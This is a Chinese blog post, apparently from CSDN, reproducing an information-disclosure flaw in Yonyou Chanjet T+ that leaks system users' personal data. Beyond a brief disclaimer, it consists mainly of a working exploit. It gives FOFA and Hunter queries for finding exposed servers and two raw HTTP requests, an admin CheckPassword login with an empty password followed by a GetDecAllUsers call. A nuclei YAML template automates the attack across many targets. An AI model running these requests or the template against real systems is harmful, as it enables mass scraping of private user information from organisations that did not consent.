（附nuclei 批量验证文件）用友畅捷通T+ getdecallusers 存在信息泄露漏洞，可获取系统用户个人信息。

nglj9527

已于 2024-05-29 18:57:00 修改

阅读量268

点赞数 5

分类专栏：漏洞复现文章标签：安全

于 2024-05-29 18:54:49 首次发布

本文链接：https://blog.csdn.net/nglj9527/article/details/139302990

版权

漏洞复现专栏收录该内容

11 篇文章 0 订阅

订阅专栏

（附nuclei 批量验证文件）用友畅捷通T+ getdecallusers 信息泄露漏洞

声明
本文仅用于技术交流，请勿用于非法用途
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，文章作者不为此承担任何责任。

1、漏洞简介

用友畅捷通T+ getdecallusers 存在信息泄露漏洞，可获取系统用户个人信息。

2、资产指纹

fofa：app=“畅捷通-TPlus”
hunter： app.name=“畅捷通 T+”

3、漏洞复现

发送以下请求。

POST /tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword HTTP/1.1
Host: {{Hostname}}
User-Agent: Opera/8.16.(X11; Linux i686; nn-NO) Presto/2.9.183 Version/12.00
Content-Length: 278
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/json

{"AccountNum": "000", "UserName": "admin", "Password": "", "rdpYear": "2023", "rdpMonth": "5", "rdpDate": "17", "webServiceProcessID": "admin", "ali_csessionid": "", "ali_sig": "", "ali_token": "", "ali_scene": "", "role": "", "aqdKey": "", "fromWhere": "browser", "cardNo": ""}

在这里插入图片描述
再发送以下请求

POST /tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers HTTP/1.1
Host: {{Hostname}}
User-Agent: Opera/8.16.(X11; Linux i686; nn-NO) Presto/2.9.183 Version/12.00
Content-Length: 54
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/json
Cookie: ASP.NET_SessionId=nlmsnrfged2dwu25dpn0xgni

{"condition": "", "accNum": "", "onlyBuying": "false"}

在这里插入图片描述

4、nuclei yaml文件

id: chanjet-getdecallusers-infoleak
 
info:
  name: 用友-畅捷通T+-Ufida-信息泄露
  author: XXX
  severity: high
 
http:
  - raw:
      - |
        POST /tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Opera/8.16.(X11; Linux i686; nn-NO) Presto/2.9.183 Version/12.00
        Accept-Encoding: gzip, deflate
        Accept: */*
        Connection: close
        Content-Length: 278
        Content-Type: application/json
        
        {"AccountNum": "000", "UserName": "admin", "Password": "", "rdpYear": "2023", "rdpMonth": "5", "rdpDate": "17", "webServiceProcessID": "admin", "ali_csessionid": "", "ali_sig": "", "ali_token": "", "ali_scene": "", "role": "", "aqdKey": "", "fromWhere": "browser", "cardNo": ""}
 
      - |
        POST /tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Opera/8.16.(X11; Linux i686; nn-NO) Presto/2.9.183 Version/12.00
        Accept-Encoding: gzip, deflate
        Accept: */*
        Connection: close
        Content-Length: 54
        Content-Type: application/json
 
        {"condition": "", "accNum": "", "onlyBuying": "false"}
 
    cookie-reuse: true
    matchers:
      - type: dsl
        dsl:
          - "status_code_1 == 200 && contains((body_1), 'error')"
          - "status_code_2 == 200 && contains((body_2), 'UserId')"
        condition: and